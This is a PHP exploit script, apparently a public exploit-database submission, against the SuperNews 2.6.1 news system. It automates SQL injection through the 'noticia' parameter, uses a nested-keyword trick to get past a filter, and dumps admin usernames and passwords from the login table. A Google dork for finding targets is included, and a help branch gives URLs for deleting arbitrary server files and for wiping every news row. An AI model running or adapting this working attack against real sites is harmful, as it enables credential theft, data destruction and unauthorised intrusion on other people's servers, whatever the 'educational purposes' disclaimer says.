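<?php
// Note: the open tag must be exactly "<?php"; "<? Php" is neither the short
// tag nor the long tag and the file fails to parse at all.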
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext:"2003-2004: SuperNews: Todos os direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian GNU/Linux
/*
Exploit for educational purposes only. Run it only against systems you are explicitly authorised to test.
A notification was sent to the developer, Fernando Pontes, by e-mail (odnanrefsetnop@bol.com.br).
SuperNews is a Brazilian news system written in PHP with a MySQL backend.
Versions prior to 2.6 have a plain, unfiltered SQL injection in the news view page (the "noticia" parameter).
The developer tried to fix the bug by stripping keywords such as "union" and "select" from the input.
The filter makes a single, non-recursive pass, so nesting a keyword inside itself bypasses it. See:
  seselectlect
After the inner "select" is removed, the characters around it join into a new "select". A second example, mixed case:
  seSELECTlect
Another SQL injection exists in the administration panel (it requires an authenticated admin session):
when deleting a post, the post ID is injectable and can be used to delete every news row in the database.
A further vulnerability in the administration panel allows arbitrary file deletion:
when deleting a post, an "unlink" parameter tells the script which image file to remove together with the post.
The value is not validated, so any other file can be deleted by passing a full path or a "../" traversal sequence.
Usage:
  php exploit.php http://target.com/supernews/
For more information about the vulnerabilities:
  php exploit.php moreinfo
Example:
  $ php exploit.php http://target.com/news/
Supernews <= 2.6.1 SQL Injection Exploit
Coded by WhiteCollarGroup-www.wcgroup.host56.com
Use at your own risk.
[*] Trying to access server...
[*] Detecting version... :-o
[!] Version: < 2.6.1 (no keyword filter) :-)
[!] Administration panel: http://target.com/news/admin/adm_noticias.php
[I] Type "exploit.php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1
User: user2
Pass: pass2
Good luck! :-D
*/
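// Only fatal errors are reported: a miss in the credential walk below used to
// produce undefined-offset notices, and transport failures produce warnings.
error_reporting(E_ERROR);
// The credential walk issues one HTTP request per row; never let PHP's
// execution time limit cut the run short.
set_time_limit(0);
// Bound every HTTP request so a silent target cannot hang the run forever.
// No "@" needed: ini_set() returns false on failure instead of raising.
ini_set('default_socket_timeout', '30');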
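/**
 * Encode a string as a MySQL hexadecimal literal ("0x..."), so it can be
 * embedded in the injected query without quote characters.
 *
 * @param string $string raw bytes to encode
 * @return string "0x" followed by two lowercase hex digits per byte
 *                (an empty input yields the bare "0x", as before)
 */
function hex($string)
{
    // bin2hex() always emits two digits per byte. The previous dechex(ord())
    // loop dropped the leading zero for bytes below 0x10, which shifted every
    // following nibble and corrupted the literal.
    return '0x' . bin2hex((string) $string);
}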
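/**
 * Replace every other occurrence of $needle in $haystack with $replace.
 *
 * Occurrences are counted left to right after each replacement, so the
 * untouched occurrence is always the one immediately following a replaced one.
 *
 * @param string      $needle        text to look for
 * @param string      $replace       text substituted for the chosen occurrences
 * @param string      $haystack      subject string
 * @param null|int    $count         accepted for signature compatibility only;
 *                                   it is neither read nor returned
 * @param bool        $replace_first true: replace the 1st, 3rd, 5th... occurrence;
 *                                   false: replace the 2nd, 4th, 6th...
 * @return string the rewritten haystack
 */
function str_replace_every_other($needle, $replace, $haystack, $count = null, $replace_first = true)
{
    $needleLen = strlen($needle);
    // strpos() with an empty needle is an error on PHP 7 and matches at every
    // position on PHP 8 (endless insertion); there is nothing to replace anyway.
    if ($needleLen === 0) {
        return $haystack;
    }
    $replaceLen = strlen($replace);

    $pos = strpos($haystack, $needle);
    if ($pos !== false && !$replace_first) {
        // Leave the first occurrence alone and start from the second.
        $pos = strpos($haystack, $needle, $pos + $needleLen);
    }

    // "!== false" is essential: a match at offset 0 is an int 0, which the
    // previous "!= false" loose comparison treated as "not found".
    while ($pos !== false) {
        $haystack = substr_replace($haystack, $replace, $pos, $needleLen);
        // Resume after the inserted text, then step over the occurrence we keep.
        $pos = strpos($haystack, $needle, $pos + $replaceLen);
        if ($pos !== false) {
            $pos = strpos($haystack, $needle, $pos + $needleLen);
        }
    }
    return $haystack;
}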
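/**
 * Remove every second occurrence of the literal text "(.*)" from $str while
 * keeping the first one (delegates to str_replace_every_other() with
 * $replace_first = false). Not called anywhere in the visible part of this file.
 *
 * @param string $str subject string
 * @return string the string with alternate "(.*)" groups stripped
 */
function removeaddregex($str)
{
    // The needle is the regex fragment "(.*)" with no inner whitespace; the
    // spaced variant that was here never matched a real capture group.
    return str_replace_every_other('(.*)', '', $str, null, false);
}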
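/**
 * Escape the PCRE metacharacters in $str with a backslash, as a hand-rolled
 * stand-in for preg_quote(). Note that, unlike preg_quote(), "-" and "#" are
 * not escaped and no delimiter argument is taken.
 *
 * @param string $str literal text to embed in a pattern
 * @return string the escaped text
 */
function preg_quote_working($str)
{
    // explode("", ...) is invalid (warning + false on PHP 7, ValueError on
    // PHP 8), so the list is spelled out. The backslash must come first:
    // escaping it last would double the backslashes added for the others.
    $chars = array('\\', '.', '+', '*', '?', '[', '^', ']', '$', '(', ')', '{', '}', '=', '!', '<', '>', '|', ':');
    foreach ($chars as $char) {
        $str = str_replace($char, '\\' . $char, $str);
    }
    return $str;
}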
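echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by WhiteCollarGroup - www.wcgroup.host56.com\nUse at your own risk.\n";

// Exactly one argument is accepted: the target base URL or the literal "moreinfo".
// A usage error exits non-zero so shell callers can tell it apart from a run.
if ($argc !== 2) {
    echo "Usage:
    php {$argv[0]} url
Example:
    php {$argv[0]} http://target.com/supernews
    php {$argv[0]} https://target.com/supernews";
    exit(1);
}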
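// "moreinfo" prints the findings this script does not automate and exits
// before any request is made. Both of them need an authenticated admin
// session on the target, as the text itself says ("after login").
if ($argv[1] === 'moreinfo') {
    echo "\nMore vulnerabilities:
- Deleting files
  You can delete files on the server, after login, using the URL:
  http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
- Deleting all news on the database:
  You can delete all news on the database with one request, only. Look:
  http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
All vulnerabilities discovered by WCGroup.\n";
    exit;
}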
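$uri = $argv[1];

// file_get_contents() honours every registered stream wrapper; insist on
// http(s) so a typo such as "file://" cannot turn the probe into a local read.
if (!preg_match('#^https?://#i', $uri)) {
    echo "\n[-] Target must be an http:// or https:// URL.\n";
    exit(1);
}

// Normalise to a trailing slash so the script names below append cleanly.
if (substr($uri, -1) !== '/') {
    $uri .= '/';
}

// The injection point is the "noticia" parameter of the news view. "-1" gives
// an empty original row set, and the trailing "+" decodes to the space that
// separates it from the UNION payload appended later.
$url = $uri . 'noticias.php?noticia=-1+';

echo "\n[*] Trying to access server...";
// "@" only mutes the transport warning; the failure itself is handled below.
$accessvr = @file_get_contents($url);

// Some installs serve the news view from index.php rather than noticias.php;
// fall back when the first path is missing (404) or errors out (mysql_query).
if ($accessvr === false || preg_match('/(404|mysql_query)/', $accessvr)) {
    $url = $uri . 'index.php?noticia=-1+';
}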
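// A random hex marker is echoed back through the injected column; seeing it in
// the response proves the UNION ran. Hex-only keeps it safe inside the regex
// and the hex() literal. It is not a secret, so mt_rand() is adequate; the old
// md5(chr(rand(48,122))) had only 75 possible values and risked false hits.
$token = substr(md5(uniqid((string) mt_rand(), true)), 0, 10);

echo "\n[*] Detecting version... :-o";

// Plain UNION first (7 columns, marker in column 5): succeeds only where no
// keyword filter is present, i.e. anything older than the 2.6.1 fix.
$gettoken = strip_tags((string) @file_get_contents(
    $url . urlencode('union all select 1,2,3,4,' . hex($token) . ',6,7 --')
));
if (strpos($gettoken, $token) !== false) {
    // The old message said "> 2.6.1", which contradicts the "<= 2.6.1 only"
    // note printed on failure; an unfiltered UNION means the pre-filter code.
    echo "\n[!] Version: < 2.6.1 (no keyword filter) :-)";
    $version = 1;
} else {
    // 2.6.1 strips "union"/"select" once, non-recursively, so a keyword nested
    // inside itself survives. Column layout (8 columns, marker in column 6)
    // mirrors the credential dump query used for this version below.
    $gettoken = strip_tags((string) @file_get_contents(
        $url . urlencode('uniunionon seleselectct 1,2,3,4,5,' . hex($token) . ',7,8 --')
    ));
    if (strpos($gettoken, $token) !== false) {
        echo "\n[!] Version: = 2.6.1 :-)";
        $version = 2;
    } else {
        echo "\n[-] Unknown version :-S";
        $version = 3;
    }
}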
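// Only when one of the two injection variants answered do we point at the
// admin panel and start pulling credentials.
if ($version !== 3) {
    echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
    echo "\n[I] Type \"{$argv[0]} moreinfo\" for get others vulnerabilities.";
    echo "\n[*] Getting user & pass 8-]";
}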
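/**
 * Walk supernews_login one row at a time through the UNION payload and print
 * each user/pass pair, stopping at the first response without the marker.
 *
 * Both version-specific loops were identical apart from the column layout,
 * so they share this helper.
 *
 * @param string $url      injection URL, already ending in "noticia=-1+"
 * @param string $token    hex marker that brackets the extracted fields
 * @param string $select   UNION prefix up to (not including) the concat() column
 * @param string $trailing columns that follow the concat() column, e.g. ",6,7"
 * @return void
 */
function supernews_dump_logins($url, $token, $select, $trailing)
{
    $marker = hex($token);
    // $token is hex-only, so it needs no escaping inside the pattern.
    $pattern = '/' . $token . '(.*)' . $token . '(.*)' . $token . '/';

    for ($row = 0; ; $row++) {
        $payload = $select . 'concat(' . $marker . ',user,' . $marker . ',pass,' . $marker . ')'
            . $trailing . ' from supernews_login limit ' . $row . ',1 --';
        $body = @file_get_contents($url . urlencode($payload));

        // A transport failure, a row without the marker, or an empty user name
        // ends the walk. The old code indexed $get[1][0] unconditionally and
        // relied on error_reporting() to hide the resulting notice.
        if ($body === false || !preg_match($pattern, strip_tags($body), $m) || $m[1] === '') {
            break;
        }
        echo "\nUser: {$m[1]}\nPass: {$m[2]}\n";
    }
    echo "\nGood luck! :-D";
}

if ($version === 1) {
    // 7-column UNION, credentials in column 5.
    supernews_dump_logins($url, $token, 'union all select 1,2,3,4,', ',6,7');
} elseif ($version === 2) {
    // Filter-bypass UNION for 2.6.1: 8 columns, credentials in column 6.
    supernews_dump_logins($url, $token, 'uniunionon seleselectct 1,2,3,4,5,', ',7,8');
} else {
    echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
    echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
    echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
    echo "\nIf you want, try to access manually:";
    // The probe above targets noticias.php (or index.php); the old text named a
    // "noticia.php" that this script never requests.
    echo "\nThe vulnerability are on view notice file (index.php or noticias.php), in variable \"noticia\", a simple SQL Injection.";
    echo "\nWe're sorry.";
}
echo "\n";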